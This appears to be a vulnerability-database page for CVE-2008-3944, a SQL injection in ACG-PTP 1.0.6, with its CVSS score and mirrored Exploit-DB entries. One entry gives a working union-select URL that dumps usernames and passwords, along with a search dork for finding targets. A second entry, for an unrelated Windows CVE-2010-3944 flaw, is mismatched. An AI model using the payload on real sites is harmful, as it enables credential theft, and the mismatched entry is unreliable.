CVE-2008-3944
published 2008-09-05CVE-2008-3944: SQL injection vulnerability in index.php in ACG-PTP 1.0.6 allows remote attackers to execute arbitrary SQL commands via the adid parameter in an adorder action.
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.97%
57.3th percentile
SQL injection vulnerability in index.php in ACG-PTP 1.0.6 allows remote attackers to execute arbitrary SQL commands via the adid parameter in an adorder action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| discountedscripts | acg_ptp | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Windows - Win32k Pointer Dereferencement (PoC) (MS10-098)
exploitdb·2010-12-17·CVSS 7.2
CVE-2010-3944 [HIGH] Microsoft Windows - Win32k Pointer Dereferencement (PoC) (MS10-098)
Microsoft Windows - Win32k Pointer Dereferencement (PoC) (MS10-098)
---
/*************************************************************************************
* MS10-098
* CVE-2010-3944
*
* Microsoft Windows Win32k pointer dereferencement
*
* --------------------
* Affected Software
* ------------------------
* Microsoft Windows 7 / 2008
*
*
* --------------------
* Consequences
* -----------------------
* An unprivileged user may be able to cause a bugcheck, or possibly execute
* arbitrary code by CSRSS.EXE.
*
*
*
* Credits : Stefan LE BERRE ([email protected])
* Ludo t0ka7a
*
* WebSites : http://www.sysdream.com/
* http://ghostsinthestack.org/
* http://infond.blogspot.com/
* http://twitter.com/hackinparis
*
* kd> r
* eax=00013370 ebx=0000000d ecx=00000000 edx=fea0069c esi=fea00618
Exploit-DB
ACG-PTP 1.0.6 - 'adid' SQL Injection
exploitdb·2008-09-04
CVE-2008-3944 ACG-PTP 1.0.6 - 'adid' SQL Injection
ACG-PTP 1.0.6 - 'adid' SQL Injection
---
|___________________________________________________|
|
| ACG-PTP 1.0.6 (adid) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
| Author: Hussin X
|
| Home : WwW.Hussin-X.CoM | www.tryag.cc/cc
|
| email: darkangel_g85[at]Yahoo[DoT]com
|
|
|___________________________________________________
| |
|
| script :http://discountedscripts.com/product_info.php?products_id=65
|
| DorK : inurl:index.php?menu=adorder
|___________________________________________________|
Exploit:
www.[target].com/Script/index.php?menu=adorder&adid=-3+union+select+null,null,concat_ws(0x3a,username,password),null+From+users--
L!VE DEMO:
http://www.discountedscripts.com/demos/a
No writeups or analysis indexed.
2008-09-05
Published